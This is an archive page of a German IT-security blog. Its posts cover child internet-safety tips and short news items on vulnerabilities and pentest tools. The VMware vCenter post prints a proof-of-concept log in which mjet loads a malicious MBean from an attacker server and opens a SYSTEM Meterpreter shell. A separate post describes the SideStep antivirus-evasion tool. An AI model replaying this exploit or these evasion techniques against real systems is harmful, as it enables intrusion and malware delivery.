18 Jan

Sicheres Surfen im Internet – Ein paar Tipps für Eltern und Kinder

internet-kinder-eltern-sicherheitSicheres Surfen im Internet – Ein paar Tipps für Eltern und Kinder
Eine Anleitung für Kinder und Jugendliche

  1. Misstrauisch sein

Wenn ihr von einem Fremden via Facebook, WhatsApp, KiK oder einem anderen Messenger freundlich angeschrieben werdet, mag das auf den ersten Blick vielleicht harmlos erscheinen, es könnte aber auch jemand sein der nichts Gutes im Sinn hat. Wenn ihr die Person nicht kennt, solltet ihr im Zweifelsfall einfach die Nachricht löschen. Das Selbe gilt auch für Freundschaftsanfragen. Wenn ihr euch nicht sicher seid, solltet ihr erst annehmen wenn ihr mit der Person in „echt“ z.B.: in der Schule gesprochen habt.

 

  1. Keine Informationen verraten

Verwendet bei euren Accounts im Internet nicht eure echten Namen, Adressen, usw.. Ihr würdet auch nicht Jedem auf der Straße einfach euren Namen verraten, weil er / sie danach fragt. In Facebook sollen zwar Benutzer ihre echten Daten angeben, wir halten das allerdings für falsch. Eure Freunde kenne eure Spitznamen und erkennen euch auch auf Profilbildern usw.
Aktuell kann ein Facebook Account für viele andere Dienste wie Instagram, Pintrest oder Spotify verwendet werden. Wir raten allerdings dazu lieber einzelne Accounts zu erstellen und nicht alles zu verbinden. Es ist zwar einfacher, weil man sich nicht überall einzeln anmelden muss, aber das ganze hat auch ein paar Nachteile:
Facebook Freunde bekommen so immer mit was ihr gerade in anderen Netzwerken macht. Getrennte Profile erhöhen auch die Sicherheit.

 

  1. Schützt eure Profile und Accounts

Passwort: Wählt ein Passwort das ihr euch leicht merken könnt, es sollte min. 10 Stellen haben, min. ein Sonderzeichen wie „!“, eine Zahl und Groß.- und Kleinschreibung.
Verwendet auf keinen Fall folgende Dinge:
Vor- und Nachnamen, Spitznamen, Haustiere, Geburtsdatum und Hobbys
Hier ein Beispiel von einem guten Kennwort: Sch8auF?el99

 

Facebook: unter folgendem Link findet Ihr die Facebook Privatsphäre Einstellungen:
https://www.facebook.com/settings/?tab=privacy&privacy_source=privacy_lite
Ihr solltet folgendes einstellen:
„Wer kann meine Inhalte sehen?“: Freunde
„Wer kann mich Kontaktieren“: Freunde von Freunden
„Wer kann nach mir suchen“: Freunde von Freunden
und unter „Möchtest du, dass Suchmaschinen außerhalb von Facebook dein Profil anzeigen?“: Nein

Instagram: Tippt in der Instagram App auf euer Profil (rechts unten in der Ecke), dann ganz oben rechts auf das Zahnrad und unter dem Menüpunkt Konto aktiviert ihr den Punkt „Privates Konto“.
Das heißt, dass nur mehr Personen eure Fotos sehen dürfen, die Ihr auch zuvor bestätigt habt.

WhatsApp: Tippt auf Einstellungen (rechts unten), dann auf „Account“, dann auf „Datenschutz“. Unter den drei Punkten solltet ihr folgendes einstellen:
„Zuletzt Online“: Niemand (Eure Eltern werden sich zwar ärgern, weil sie nicht mehr sehen wie lange ihr auf wart, aber es geht auch niemand etwas an wann ihr online seid und wann nicht.)
„Profilbild“: Meine Kontakte
„Status“: Meine Kontakte

 

  1. Glaubt nicht alles im Internet

Im Internet und vor allem in Facebook finden sich viele unglaubliche Geschichten und Nachrichten, z.B.: Facebook wird ab sofort was kosten, Todkranken Kindern und bei jedem Like zahlt Facebook ein paar Cent und viele viele mehr.
Selbst Erwachsenen fällt es oft schwer die Wahrheit zu erkennen.
Teilt nicht alles und hinterfragt solche Meldungen. Redet mit euren Eltern darüber ob das stimmen kann.

Unter folgendem Link findet ihr einen Verein der Falschmeldungen und Internetmissbrauch auflistet (gegebenenfalls könnt ihr hier nachlesen ob eine Meldung falsch ist.) http://www.mimikama.at

 

  1. Viren, Würmer und Trojaner

Der beste Schutz gegen Viren, Würmer und Trojaner ist immer noch der „Anti Viren Schutz“. Auf jedem Computer sollte so ein Programm installiert sein. Einen Anti Virenschutz erhaltet ihr kostenlos im Internet, Googelt einfach nach „free antivirus“.
Ein paar Hersteller: AVG, Avira, Avast
Die freien Antiviren Programme haben zwar immer Werbung enthalten wo steht, dass ihr unbedingt die Vollversion kaufen müsst, aber die gratis Version reicht im Normalfall aus und ihr könnt die Werbung einfach ignorieren.

 

  1. Email

Am besten verwendet ihr zwei Email Adressen, eine für Schule, Freunde, Facebook usw. und eine Email-Adresse für Internetforen, Gewinnspiele, und diverse Dienste wo ihr eure Email angeben müsst.
Die zweite Email-Adresse wird dann wahrscheinlich von diversen Spammails gefüllt, die ihr dann einfach löschen könnt.
Öffnet keine Email-Anhänge von Personen die ihr nicht kennt, sehr oft ist im Email Anhang ein Virus zu finden.

 

  1. Mobbing

Wenn ihr lest wie andere Personen auf ask.fm, Facebook, Instagram, usw. von anderen gemobbt oder beleidigt werden, solltet ihr auf keinen Fall einfach zusehen.
Das Beste wäre es dem Opfer beizustehen und euch hinter das Opfer zu stellen.
Ihr könnt einfach posten das ihr mit Mobbing oder Beleidigungen nicht einverstanden seid auch wenn das sehr viel Mut kostet.
Und in jedem Fall könnt ihr euch bei Eltern, Lehrern oder Facebook selbst Hilfe holen, auch wenn ihr nicht selbst betroffen seid.

Was könnt ihr tun, wenn ihr selbst beleidigende Kommentare bekommt?
Das Beste ist es diese Kommentare zu löschen, damit nicht noch mehr Personen beleidigende Dinge dazu schreiben können. Vor dem Löschen solltet ihr aber auf jeden Fall Fotos von den Kommentaren machen, da diese später vielleicht als Beweis wichtig sind. Im Notfall kann auch die Polizei helfen, denn was viele nicht wissen ist das man sich mit Beleidigungen oder Lügen sowie der Verbreitung von Fotos und Videos von anderen Personen (ohne das diese Person damit einverstanden ist) auch strafbar macht.

Eltern Info:

  1. Seit 1.1.2016 ist laut §107c StGB Cybermobbing strafbar.
  2. Beratungsstellen:

https://die-moewe.beranet.info
https://www.rataufdraht.at

15 Jan

777 – OpenSSH-Vulnerability leaked geheime Schlüssel

777-triple-seven-opensshTriple Seven – (CVE-2016-0777 und -0778) – OpenSSH Vulnerability

Eine seit 2010 standardmäßig aktivierte und unfertige OpenSSH Option führt dazu das Server die geheimen Schlüssel der sich verbindenden Benutzern auslesen kann.
Updates, zum schließen der Lücke, wurden bereits veröffentlicht.

Aufgrund der CVE Nummer CVE-2016-0777 und -0778 hat diese Schwachstellen den Spitznamen „Triple-Seven“ bekommen.
Betroffen sind alle Open SSH-Versionen von 5.4 – 7.1. Update 7.1p2 schließt die Lücke.

Hier der Security Advisor mit Proof of Concept  von Qualys

14 Jan

Achtung UPC Kunden – Standard WLAN Passwörter leicht zu hacken

hackedDer niederländische Sicherheitsforscher Peter Geissler hat ein Tool veröffentlicht mit dem sich die Standard Passwörter von einigen UPC Modems leicht berechnen lassen.

UPC Kunden sollten ihre WLAN Kennwörter so schnell wie möglich ändern.

Fehler:
Das WPA2 Kennwort bei UPC Modems wird aus der geheimen Seriennummer des Modems generiert und genau hier hat UPC ordentlich gepatzt. Die Seriennummer korrespondiert unerfreulicherweise leider mit der ESSID welche öffentlich einsehbar ist.
Dadurch lässt sich das Kennwort mit wenig aufwand berechnen.

UPC hat begonnen seine Kunden per Mail zu informieren.

Hier finden sie die Anleitung zum ändern des WLAN Kennworts der verschiednen Modems von UPC:
Link

13 Jan

ChameleonMini – NFC/RFID Pentesting Tool

Neues NFC / RFID Security und Pentest Tool.
Die frei programmierbare Plattform kann perfekte Klone von verschiedenen bestehenden kommerziellen Smartcards , einschließlich kryptographische Funktionen, erstellen.
Es kann für verschiedenste RFID und NFC Angriffsszenarien verwendet werden, z.B. replay und relay attacks sowie state restoration attacks oder NFC sniffing.

mehr unter: https://www.kickstarter.com/projects/1980078555/chameleonmini-a-versatile-nfc-card-emulator-and-mo

03 Okt

Kritische Lücke in VMware vCenter Server und ESXi

LOGO1

Advisory ID: VMSA-2015-0007
CVE Numbers: CVE-2015-5177 CVE-2015-2342 CVE-2015-1047

CVE-2015-5177 – kritisch
Fehler im JMX-RMI-Service im vCenter Server. – Remote Code Execution
Hier ist bereits ein Metasploit Modul verfügbar.

Proof of Concept:
root@Whack:/opt/mjet# nmap -sS 1.1.1.2 -p 9875 –script=/usr/share/nmap/scripts/rmi-dumpregistry.nse
Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-15 16:56 BST
Nmap scan report for 1.1.1.2
Host is up (0.00036s latency).
PORT STATE SERVICE
9875/tcp open java-rmi
| rmi-dumpregistry:
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @1.1.1.2:50966
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
MAC Address: 00:0C:29:D1:00:30 (VMware)
root@Whack:/opt/mjet# java -jar mjet.jar -t 1.1.1.2 -p 9875 -u http://1.1.1.1:8080/TArDcls4aeQZVWl
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
--------------------------------------------------- 
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://1.1.1.2:9875/jmxrmi ...
[+] Connected: rmi://1.1.1.2 16
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://1.1.1.1:8080/TArDcls4aeQZVWl
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: drmwfzvo:name=NApCjRCB,id=gsKsVVHK
[+] Invoking: metasploit.Metasploit.run()
[+] Done
Metasploit Shell
-------------------------
2015-02-24 10:11:44 +0000 S:0 J:3 msf exploit(java_mlet_server) >
[*] Using URL: http://1.1.1.1:8080/TArDcls4aeQZVWl
[*] Server started.
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl/
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] Sending stage (30355 bytes) to 1.1.1.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.2:50456) at 2015-02-24 10:12:32 +0000
 
2015-02-24 10:14:10 +0000 S:1 J:3 msf exploit(java_mlet_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: SYSTEM

CVE-2015-5177:
Fehler in der OpenSLP-Funktion – Remote Code Execution
Betroffene Versionen 5.0, 5.1 und 5.5

CVE-2015-1047:
Der vpxd Service bei den Versionen 5.0,5.1 und 5.5 ist für DoS-Attacken anfällig.

Entsprechende Updates sind bei VMware bereits verfügbar.

02 Okt

Evil FOCA – Network Attack Tool

Evil FOCA ist ein Windows Tool zum überprüfen der Sicherheit von IPV4 und IPV6 Netzen für Pentester und Auditoren.

Folgende Attacken sind möglich:

  • MITM über IPV4 mit ARP spoofing und DHCP ACK Injections.
  • MITM über IPV6 mit Neighbor Advertisment Spooing, SLAAC attacks und fake DHCPv6
  • DoS auf IPV4 mit ARP Spoofing
  • DoS auf IPV6 mit SLAAC DoS
  • DNS Hijacking

Evil FOCA scannt automatisch das gesammte Netz, alle Geräte und deren Netzwerkinterfaces, und fügt alle IPV6, IPV4 und Physische Adressen in ein intuitives Interface ein.

Evil Foca is released under the GNU Public License 3.0
Link

01 Okt

Bypass Apple’s Gatekeeper – Malware auf den Mac schmuggeln

Der leitende Sicherheitsforscher Wardle hat den Sicherheitsmechanismus „Gatekeeper“ von Apples Betriebssystem OS X umgangen und unsignierten Code ausgeführt.

Der Gatekeeper überprüft Programme vor der Installation und prüft, ob diese aus einer vertrauenswürdigen Quelle stammen. Wenn das der Fall ist, sind diese entsprechend signiert und das Programm kann installiert werden. Wardle zeigte jedoch auf, dass man diese Überprüfung vergleichsweise einfach umgehen kann.

Als Einfallstor setzte Wardle auf eine von Apple als vertrauenswürdig eingestufte Binär-Datei. In seinem Test packte er diese in ein Apple Disk Image, welche er mit einer weiteren, nicht-signierten Anwendung auffüllte.

Beim Installieren hat Gatekeeper die signierte Binär-Datei als vertrauenswürdig eingestuft und im gleichen Zuge auch die nicht-signierte Anwendung durchgewinkt und ausgeführt. Das passiert, weil Gatekeeper nur die erste Anwendung prüft und das folgende nicht mehr.

(teilw. ct anw)

04 Jul

SideStep: AV Evasion Tool

SideStep is a nice tool to bypass anti-virus software. The tool generates Metasploit payloads encrypted using the CryptoPP library, and uses several other techniques to evade AV.

SideStep generates Meterpreter shellcode, randomly generates an encryption key, and then encrypts the shellcode using AES-128bit with the random key. All variables and function names are also randomly generated.

In addition, to encrypting the shellcode and assigning random names, it also generates a configurable number of random variables with configurable value lengths. Surprisingly, this can also help evade AV.

To evade AV sandboxes, I implemented a function that checks the current time, and then loops until a configurable number of seconds have passed since the current time. As an added small time function, I have added support for generating 1024 or 2048bit DH parameters. I chose these methods as I’ve read that some AV hook sleep function calls.

SideStep can also be configured to strip debugging and other symbol information from the final executable and then randomly encode the assembly instructions using peCloak.

Source: GitHub
More info: Here..

11 Jun

Stealing iCloud Passwords made easy!

IOS-Mail.app Inject-Kit

jansoucek found a bug in the Apple IOS 8.3 Mail.app, resulting in „meta http-equiv=refresh HTML tag in email messages not being ignored. This bug allows remote HTML content to be loaded, replacing the content of the original email message. With simple HTML and CSS its possible to build a functional password „collector“.

This bug was published to Apple on 15.01.2015 but the fix is not delivered till now

Source and Proof of concept code is available on github.

Demo:

06 Jun

Let´s Encrypt: Freies SSL für Alle

Let´s Encrypt ist eine freie, automatisierte und offene certificate authority (CA) und frei verfügbar für alle.
Gestartet und betrieben wird das ganze Mitte 2015 von der Internet Research Group (ISRG).

Wie funktioniert das ganze?
Es könnte nicht einfacher sein:
Um unter Linux für seinen Webserver SSL zu aktivieren reicht wohl folgendes aus:

$ sudo apt-get install lets-encrypt

$ lets-encrypt example.com

mehr unter letsencrypt.org